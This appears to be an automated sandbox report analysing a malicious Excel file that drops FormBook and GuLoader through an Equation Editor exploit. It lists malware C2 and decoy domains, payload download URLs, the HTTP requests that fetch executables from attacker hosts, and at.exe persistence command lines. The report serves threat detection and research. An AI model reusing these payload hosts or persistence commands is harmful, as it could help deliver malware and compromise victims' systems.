Play interactive tour

Edit tour

Analysis Report Required Order Quantity.xlsx

Overview

General Information

Sample Name:	Required Order Quantity.xlsx
Analysis ID:	385184
MD5:	0bbf60240e66e82ba4adf5d8e9b61ba0
SHA1:	d9d2142b4b34e3aad4020dd4d2ee918bd7d34847
SHA256:	3b4f801135ba694a061a4608da04b1c0935f090b7b4c540bcace9b1bd1eecb9a
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Early bird code injection technique detected

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Changes the view of files in windows explorer (hidden files and folders)

Creates an undocumented autostart registry key

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected VB6 Downloader Generic

Adds / modifies Windows certificates

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a global mouse hook

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

PE file contains an invalid checksum

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2208 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2352 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 3012 cmdline: 'C:\Users\Public\vbc.exe' MD5: AD0C93B574BB947CFF15483EDA82811E)

vbc.exe (PID: 2464 cmdline: c:\users\public\vbc.exe MD5: ABBFBEC83B67CA488DF807F74D5773B7)

vbc.exe (PID: 1756 cmdline: c:\users\public\vbc.exe MD5: ABBFBEC83B67CA488DF807F74D5773B7)

icsys.icn.exe (PID: 552 cmdline: C:\Users\user\AppData\Local\icsys.icn.exe MD5: D5809935B2F8A4579AAADCA96C2920EE)

explorer.exe (PID: 2288 cmdline: c:\windows\system\explorer.exe MD5: 65343007BC733953C401ADFE6E510AB7)

spoolsv.exe (PID: 2004 cmdline: c:\windows\system\spoolsv.exe SE MD5: 817B37415965598BD5AF7AC6AC9A486B)

svchost.exe (PID: 1336 cmdline: c:\windows\system\svchost.exe MD5: 9E2126D03A69C95E6FAE5281AA482ACC)

spoolsv.exe (PID: 1320 cmdline: c:\windows\system\spoolsv.exe PR MD5: 817B37415965598BD5AF7AC6AC9A486B)

at.exe (PID: 2564 cmdline: at 07:50 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 1776 cmdline: at 07:51 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 2404 cmdline: at 07:53 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 2956 cmdline: at 07:55 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 2844 cmdline: at 07:57 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 2976 cmdline: at 07:59 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 1696 cmdline: at 08:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 2216 cmdline: at 08:03 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 1820 cmdline: at 08:05 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 2268 cmdline: at 08:07 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 288 cmdline: at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 2032 cmdline: at 08:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

at.exe (PID: 572 cmdline: at 08:13 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 7BD932FFA2E9B359CB0544615973D149)

svchost.exe (PID: 2876 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

taskeng.exe (PID: 2328 cmdline: taskeng.exe {101D7849-1F13-4446-86DC-A878F583ACDC} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}

Threatname: GuLoader

{"Payload URL": "https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin\u0000http://103.141.138.118/bin_iOxAb78"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x618e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x61b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6d685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6d171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6d787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x6d8ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6257a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x6c3ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x63273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x73327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x7432a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x70409:$sqlite3step: 68 34 1C 7B E1 0x7051c:$sqlite3step: 68 34 1C 7B E1 0x70438:$sqlite3text: 68 38 2A 90 C5 0x7055d:$sqlite3text: 68 38 2A 90 C5 0x7044b:$sqlite3blob: 68 53 D8 7F 8C 0x70573:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 2464	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: vbc.exe PID: 2464	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 6 entries

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 103.141.138.118, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2352, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2352, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\Public\vbc.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\system\svchost.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\system\explorer.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\mrsys.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\system\spoolsv.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\stsys.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Show sources

Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}
Source: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin\u0000http://103.141.138.118/bin_iOxAb78"}

Multi AV Scanner detection for submitted file

Show sources

Source: Required Order Quantity.xlsx

ReversingLabs: Detection: 22%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Windows\system\svchost.exe	Joe Sandbox ML: detected
Source: C:\Windows\system\explorer.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\mrsys.exe	Joe Sandbox ML: detected
Source: C:\Windows\system\spoolsv.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\stsys.exe	Joe Sandbox ML: detected

Source: 11.0.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 9.0.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.0.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.1.explorer.exe.2540000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 9.2.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.2.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 11.2.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 7.0.icsys.icn.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.0.vbc.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 10.2.svchost.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.2.vbc.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 10.1.svchost.exe.1d90000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.1.vbc.exe.2c20000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 7.2.icsys.icn.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 10.0.svchost.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49165 version: TLS 1.2

Source:	Binary string: wntdll.pdb source: vbc.exe
Source:	Binary string: wuapp.pdb source: explorer.exe, 00000008.00000003.2221194170.000000000095A000.00000004.00000001.sdmp

Source: excel.exe

Memory has grown: Private usage: 4MB later: 67MB

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp	4_2_00417143
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp	4_2_00416130
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp	4_2_004171D7
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp	4_2_004179F2
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp	4_2_00417190
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp	4_2_0041725A
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then push ebp	4_2_004172E5

Source: global traffic

DNS query: name: fqe.short.gy

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 52.59.165.42:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 52.59.165.42:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49168 -> 103.141.138.118:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: www.evolvekitchendesign.com/ffw/
Source: Malware configuration extractor	URLs: https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 05:47:19 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Sun, 11 Apr 2021 22:43:28 GMTETag: "5cb48-5bfba202eca11"Accept-Ranges: bytesContent-Length: 379720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 31 6d fe f9 50 03 ad f9 50 03 ad f9 50 03 ad 7a 4c 0d ad f8 50 03 ad 90 4f 0a ad f3 50 03 ad 10 4f 0e ad f8 50 03 ad 52 69 63 68 f9 50 03 ad 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fc af f7 4d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 02 00 00 30 00 00 00 00 00 00 70 36 00 00 00 10 00 00 00 c0 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 02 00 00 10 00 00 c8 b1 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 ac 02 00 28 00 00 00 00 e0 02 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 84 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 a7 02 00 00 10 00 00 00 b0 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 74 1b 00 00 00 c0 02 00 00 10 00 00 00 c0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 05 00 00 00 e0 02 00 00 10 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 24 a7 91 47 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

IP Address: 103.141.138.118 103.141.138.118

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /findoc/svchost.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyworkfinetraingst.dns.army
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FB5DC01.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /findoc/svchost.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyworkfinetraingst.dns.army
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
